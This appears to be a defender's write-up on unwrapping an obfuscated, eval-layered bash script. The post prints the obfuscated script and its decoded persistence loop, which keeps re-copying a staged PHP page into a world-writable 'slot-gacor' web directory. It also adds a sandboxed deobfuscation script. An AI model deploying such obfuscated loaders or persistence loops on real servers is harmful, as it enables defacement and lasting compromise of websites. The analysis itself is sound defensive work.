z="
";CFz='z$tz';UFz='z$Hz';ZBz='m'\'';H';jz=';bz=';xCz='='\''il';tCz='kz='\''';jCz='z='\''g';hEz='$Sz$';GDz=''\'' do';WDz='r'\'';y';eBz=';Zz=';SBz='uk'\'';';PCz='hmod';Hz='='\''ap';vEz='z$lz';sDz='='\''/s';XEz='z$Fz';lBz='e :;';kz=''\''pps';IBz='s'\'';T';ODz='='\''go';KEz=';fBz';ABz=''\'';iB';SFz='z$LB';sz='i'\'';V';az='iany';bBz=''\'';WB';KFz='DBz$';bEz='$Kz$';jEz='z$Vz';pz='/v'\'';';YDz='kca'\''';cCz='ab.g';BFz='rz$s';yFz='Bz$j';kDz='; sl';Ez='uz='\''';Gz=''\'';Nz';aDz='='\''pi';EGz='Bz$o';cFz='Rz$N';aCz=''\''aco';TEz=' "$A';aEz='z$Jz';HBz=''\''id/';KBz='t-g'\''';
...
;lFz='Bz$W';CCz=''\''ouc';hCz='ndex';rCz='='\''ex';iCz=''\'';BB';SCz=';KBz';MFz='FBz$';iFz='Bz$T';Vz='ark'\''';CDz='h'\'';m';VDz=''\''/va';IEz='z='\''0';gz='o'\'';P';xDz='z='\''r';tz='capi';NEz='fz='\''';FEz='-'\'';P';iBz=';GBz';dBz='.gi'\''';BEz='='\''an';yCz='.g'\'';';Jz='nz='\''';cz='='\''ar';QEz='='\''kc';HCz='='\''ta';rFz='Bz$c';VEz='$Cz$';HFz='ABz$';sFz='Bz$d';TBz='Xz='\''';pBz='Vz='\''';VCz='JBz=';YFz='$Mz$';uBz=''\''4 /';PBz='ar '\''';DCz='h'\'';q';FBz='&1'\'';';fBz=''\'' 06';yz='d/sl';DDz='z='\''s';OBz='z='\''v';wDz=''\'';YB';KCz='dukc';XCz='0'\'';o';fEz='Pz$Q';aFz='z$Pz';nz=''\'';cz';tFz='Bz$e';FFz='z$xz';XFz='z$Lz';sCz='.p'\'';';Zz='iz='\''';SDz='z='\''w';uFz='Bz$f';iEz='Tz$U';RCz='go.'\''';BCz='OBz=';mz='dir ';
...
mFz='Bz$X';WBz='ps'\'';';bDz='l.'\'';';LEz='='\''es';MBz=''\''ar/';gFz='Bz$R';JFz='CBz$';bCz='r'\'';D';oDz=''\''/di';XDz='z='\''u';UCz='7 '\'';';DFz='$uz$';wBz='app'\''';vDz='cp /';qEz='$ez$';Fz='erv/';RFz='KBz$';UEz='z$Bz';yDz='kab'\''';kBz='ga'\'';';CGz='Bz$m';cBz='z='\''l';tEz='$iz$';FDz=';Cz=';fCz='sd'\'';';uDz='Dz='\''';TDz='w/d'\''';Yz='&>'\'';';jFz='Bz$U';NCz=' /'\'';';rz=''\''w/d';AEz=';XBz';EEz=''\''lot';kEz='$Wz$';EFz='vz$w';YEz='$Gz$';PFz='IBz$';VFz='$Iz$';Wz=';lBz';oBz='b.'\'';';Lz=''\'';nB';iDz=''\''/de';dFz='Bz$O';vCz=''\'';oB';nCz='va'\'';';YCz='r/i'\''';nDz=';Lz=';dz='ka'\'';';ZEz='Hz$I';pCz='shm/';mDz=';mk'\''';DEz='bBz=';Cz='='\''de';ZFz='Nz$O';WEz='Dz$E';Az='z="';bFz='$Qz$';
eval "$Az$z$Bz$Cz$Dz$Ez$Fz$Gz$Hz$Iz$Jz$Kz$Lz$Mz$Nz$Oz$Pz$Qz$Rz$Sz$Tz$Uz$Vz$Wz$Xz$Yz$Zz$az$bz$cz$dz$ez$fz$gz$hz$iz$jz$kz$lz$Rz$mz$nz$oz$pz$qz$rz$sz$Rz$tz$uz$vz$wz$xz$yz$ABz$BBz$CBz$DBz$EBz$FBz$GBz$HBz$IBz$JBz$KBz$LBz$MBz$NBz$OBz$PBz$QBz$RBz$SBz$TBz$UBz$VBz$Hz$WBz$XBz$YBz$ZBz$Rz$aBz$bBz$cBz$dBz$eBz$fBz$gBz$Mz$hBz$iBz$jBz$kBz$Rz$lBz$mBz$nBz$oBz$pBz$qBz$rBz$JBz$sBz$tBz$uBz$vBz$Mz$wBz$xBz$yBz$ACz$BCz$CCz$DCz$ECz$FCz$GCz$HCz$ICz$JCz$KCz$LCz$MCz$NCz$OCz$PCz$QCz$ECz$RCz$SCz$TCz$UCz$VCz$WCz$XCz$JBz$YCz$ZCz$aCz$bCz$Rz$cCz$dCz$eCz$fCz$gCz$hCz$iCz$jCz$kCz$lCz$mCz$nCz$oCz$pCz$qCz$rCz$sCz$tCz$uCz$vCz$cBz$wCz$xCz$yCz$ADz$BDz$CDz$DDz$EDz$FDz$GDz$HDz$DDz$IDz$JDz$KDz$LDz$Rz$MDz$NDz$ODz$PDz$QDz$GDz$RDz$SDz$TDz$UDz$VDz$WDz$XDz$YDz$ZDz$aDz$bDz$cDz$dDz$eDz$fDz$gDz$hDz$iDz$jDz$Rz$kDz$lDz$Mz$mDz$nDz$oDz$pDz$OBz$qDz$rDz$sDz$tDz$uDz$vDz$wDz$xDz$yDz$AEz$BEz$CEz$DEz$EEz$FEz$Rz$GEz$HEz$IEz$JEz$KEz$LEz$MEz$NEz$OEz$PEz$QEz$REz$z$SEz$TEz$UEz$VEz$WEz$XEz$YEz$ZEz$aEz$bEz$cEz$dEz$eEz$fEz$gEz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$pEz$qEz$rEz$sEz$tEz$uEz$vEz$wEz$xEz$yEz$AFz$BFz$CFz$DFz$EFz$FFz$GFz$HFz$IFz$JFz$KFz$LFz$MFz$NFz$OFz$PFz$QFz$RFz$ZEz$aEz$bEz$cEz$dEz$eEz$fEz$gEz$hEz$iEz$SFz$TFz$UFz$VFz$WFz$XFz$YFz$ZFz$aFz$bFz$cFz$dFz$eFz$fFz$gFz$hFz$iFz$jFz$kFz$lFz$mFz$nFz$oFz$pFz$qFz$rFz$sFz$tFz$uFz$vFz$wFz$xFz$yFz$AGz$BGz$CGz$DGz$EGz$FGz"
The script is written in bash and is very long. The hundreds of short variable assignments followed by a single eval of their concatenation show that it has been obfuscated: the real commands only exist once the string is assembled at run time. So the script has to be decoded before we can know what the system will do when it is executed.
So I did a little research on how to deobfuscate bash scripts and found the approach in a post on Stack Overflow (all hail Stack Overflow!).
Here's how to deobfuscate it in bash:
- Look for the eval builtin in the script. It is the point where the assembled string is executed; everything before it is just variable assignments that build that string.
- Replace the eval with printf '%s\n' (without the double quotes). The assignments still run, but the assembled command is now printed instead of executed. Replace only the eval that runs the concatenated string, not the letters e-v-a-l if they happen to appear inside a quoted fragment, and check that the script contains nothing other than assignments and that one eval before you run it.
The code will be like this:... bFz='$Qz$'; printf '%s\n' "$Az$z$Bz$Cz$Dz$Ez$Fz$Gz$Hz$Iz$Jz$Kz$Lz$Mz$Nz$Oz$Pz$Qz$Rz$Sz$Tz$Uz$Vz$Wz$Xz$Yz$Zz$az$bz$cz$dz$ez$fz$gz$hz$iz$jz$kz$lz$Rz$mz$nz$oz$pz$qz$rz$sz$Rz$tz$uz$vz$wz$xz$yz$ABz$BBz$CBz$DBz$EBz$FBz$GBz$HBz$IBz$JBz$KBz$LBz$MBz$NBz$OBz$PBz$QBz$RBz$SBz$TBz$UBz$VBz$Hz$WBz$XBz$YBz$ZBz$Rz$aBz$bBz$cBz$dBz$eBz$fBz$gBz$Mz$hBz$iBz$jBz$kBz$Rz$lBz$mBz$nBz$oBz$pBz$qBz$rBz$JBz$sBz$tBz$uBz$vBz$Mz$wBz$xBz$yBz$ACz$BCz$CCz$DCz$ECz$FCz$...
- Now I try to execute the script. If you are unsure about executing the script on your computer, you can use online tools such as OnlineGDB or the online Bash compiler from Tutorials Point. Keep in mind that even with eval replaced you are still running attacker-supplied code (the assignments themselves execute), so a throwaway VM or container with no network access is the safer choice, and the script may contain the victim's hostnames or paths that you may not want to paste into a public service.
- After running it, the initial code has changed into something like this:
z=" ";Ez='dev/';uz='erv/';Nz='apil';nz='-gac';nBz='/nul';Az='whil';QBz='pser';CBz='yark';lBz='e &>';iz='iany';jz='arka';cBz='gaco';Pz='nyar';bz='ppse';MBz='dir ';cz='rv/v';TBz='w/di';VBz='capi';lz='.id/';Sz='d/sl';iBz='eep ';gBz='0>&1';aBz='id/s';Tz='ot-g';dz='ar/w';Gz='var ';UBz='sduk';Xz='hp;c';tz='apps';IBz=';chm';HBz='cor/';WBz='l.gi';Zz=' 064'; ... ABz='pil.';wz='www/';rz=';mkd';mBz='/dev';hBz='; sl';LBz='/;mk';Lz='/dis';vz='var/';FBz='/slo';Dz='cp /';YBz='rkab';XBz='anya';bBz='lot-';PBz=' /ap';jBz='0,1;';fBz='ess ';fz='isdu';gz='kcap'; eval "$Az$Bz$Cz$Dz$Ez$Fz$Gz$Hz$Iz$Jz$Kz$Lz$Mz$Nz$Oz$Pz$Qz$Rz$Sz$Tz$Uz$Vz$Wz$Xz$Yz$Zz$az$bz$cz$dz$ez$fz$gz$hz$iz$jz$kz$lz$mz$nz$oz$pz$qz$rz$sz$tz$uz$vz$wz$xz$yz$ABz$BBz$CBz$DBz$EBz$FBz$GBz$HBz$IBz$JBz$KBz$Hz$Iz$Jz$Kz$Lz$Mz$Nz$Oz$Pz$Qz$Rz$Sz$Tz$Uz$LBz$MBz$Hz$Iz$Jz$Kz$Lz$Mz$Nz$Oz$Pz$Qz$Rz$NBz$OBz$PBz$QBz$RBz$SBz$TBz$UBz$VBz$WBz$XBz$YBz$ZBz$aBz$bBz$cBz$dBz$eBz$fBz$gBz$hBz$iBz$jBz$kBz$lBz$mBz$nBz$oBz"
- Now parts of the script are readable, but it is still a list of variable fragments ending in another eval: the first pass only unpacked a second obfuscated layer. Apply the same replacement and run it again. Obfuscators often apply the transformation several times, so keep going until the output contains no eval at all.
- Now everything is clear. These are the commands the script executes (I edited several parts because they contain sensitive words):
while :; do cp /dev/shm/var /appserv/var/www/[redacted]/slot-gacor/index.php;chmod 0644 /appserv/var/www/[redacted]/slot-gacor/index.php;mkdir /appserv/var/www/[redacted]/slot-gacor/;chmod 0777 /appserv/var/www/[redacted]/slot-gacor/;mkdir /appserv/var/www/[redacted]/;touch /appserv/var/www/[redacted]/slot-gacor/.htaccess 0>&1; sleep 0,1; done &>/dev/null
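The procedure above, scripted, as an added example that is not part of the original post: the script below strips a layered eval obfuscation automatically. It replaces each eval that starts a statement with printf "%s\n", runs the result in a bash with an empty PATH, restricted mode and the dangerous builtins disabled (so a missed eval, a $(...) hidden in a value or an absolute-path command cannot execute), and repeats until the printed layer contains no eval. The two-layer SAMPLE, the function names and the payload paths (/dev/shm/payload, /var/www/html/x.php) are constructed here to mimic the structure of the script on this page; the payload string is made up and is never executed. It assumes bash plus GNU grep and sed.

```bash
#!/usr/bin/env bash
# Added example (not the post's code): iterative eval -> printf unwrapping of a
# layered bash obfuscator, with each layer run in a locked-down bash so that
# nothing but assignments and printf can do anything.

# Constructed two-layer sample in the style of the script on the page. Layer 0
# assembles layer 1 (another variable soup plus eval); layer 1 assembles the
# made-up payload string, which is printed, never executed.
SAMPLE=$(cat <<'EOF'
a='Az='\''while :; do cp '\'';Bz='\''/dev/shm/payload '\'';';b='Cz='\''/var/www/html/x.php; '\'';Dz='\''sleep 1; done'\'';';c='eval "$Az$Bz$Cz$Dz"';eval "$a$b$c"
EOF
)

# True if the text contains an eval at the start of a statement (line start or
# after ';'). The letters "eval" inside a quoted fragment do not count, which
# is why a plain word-boundary match would be wrong here: layer 0 above stores
# layer 1's eval inside the value of $c.
has_eval() {
  printf '%s\n' "$1" | grep -Eq '(^|;)[[:space:]]*eval[[:space:]]'
}

# Replace statement-level eval with printf "%s\n", exactly as the post does by
# hand. Everything else in the layer is left untouched.
replace_eval() {
  printf '%s\n' "$1" | sed \
    -e 's/^[[:space:]]*eval[[:space:]]\{1,\}/printf "%s\\n" /' \
    -e 's/;[[:space:]]*eval[[:space:]]\{1,\}/;printf "%s\\n" /g'
}

# Run one (already rewritten) layer and return its stdout, i.e. the next layer.
# Defence in depth for the case where a replacement was missed or a value hides
# a $(...): empty PATH (no external commands), eval/exec/source/command/builtin/
# kill/trap disabled, and restricted mode (no commands containing a slash, no
# output redirections, PATH cannot be restored).
run_layer() {
  bash -c "PATH=''; enable -n eval exec source . command builtin kill trap; set -r
$1"
}

# Peel layers until no statement-level eval is left; print the final plaintext.
# Intermediate layers go to stderr so the analyst can see each stage.
deobfuscate() {
  layer=$1
  depth=0
  while has_eval "$layer"; do
    depth=$((depth + 1))
    if [ "$depth" -gt 20 ]; then
      echo "giving up: more than 20 layers" >&2
      return 1
    fi
    layer=$(run_layer "$(replace_eval "$layer")") || return 1
    printf 'layer %d:\n%s\n\n' "$depth" "$layer" >&2
  done
  printf '%s\n' "$layer"
}

deobfuscate "$SAMPLE"
```

On the page's own script this loop would print the L16 stage first and the while loop last; in a case where the final layer itself still needs to run to reveal more (a base64 blob, a here-document), stop and inspect rather than letting the sandboxed bash execute it, since the payload stage is exactly what must never run.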
Conclusion:
In my opinion, deobfuscating a bash script of this kind is not difficult, but it does require care. The obfuscation keeps the real commands out of the file until run time, which makes such scripts hard for antivirus and malware scanners to match on, so we need to be careful and thorough when hunting for them. In this case the deobfuscated script is a persistence mechanism: an endless loop that copies an attacker-controlled PHP page staged in /dev/shm/var into a slot-gacor/ directory under the web root, creates the directory and makes it world-writable, drops an .htaccess file and repeats every fraction of a second, so the defacement page keeps reappearing no matter how often it is deleted. Removing index.php alone therefore achieves nothing while the loop runs; the process has to be killed, the staged copy in /dev/shm removed, and the world-writable directory it leaves behind cleaned up as well.
*) PS: I edited some of the code in the example script, so if you want to try this yourself, use the script from the Stack Overflow post I mentioned earlier.